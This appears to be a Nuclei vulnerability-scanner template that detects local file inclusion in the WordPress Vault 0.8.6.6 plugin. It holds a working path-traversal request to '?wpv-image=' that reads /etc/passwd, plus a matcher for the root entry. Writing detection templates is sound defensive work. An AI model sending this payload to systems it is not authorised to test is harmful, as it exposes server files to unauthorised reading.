id: wp-vault-local-file-inclusion

info:
  name: WordPress Vault 0.8.6.6 - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: WordPress Vault 0.8.6.6 is vulnerable to local file inclusion.
  reference:
    - https://www.exploit-db.com/exploits/40850
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    max-request: 1
  tags: lfi,edb,wp-plugin,wordpress

http:
  - method: GET
    path:
      - "{{BaseURL}}/?wpv-image=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200

# digest: 4a0a00473045022100b6716a61414f29710ea8749e7662c327f86cb11dd12935bd97c696830ad5df1602201503de5ec7aa5bb13732ce57472e7b7c52e1bd8563745017fc47da0b0db7a41d:922c64590222798bb761d5b6d8e72950
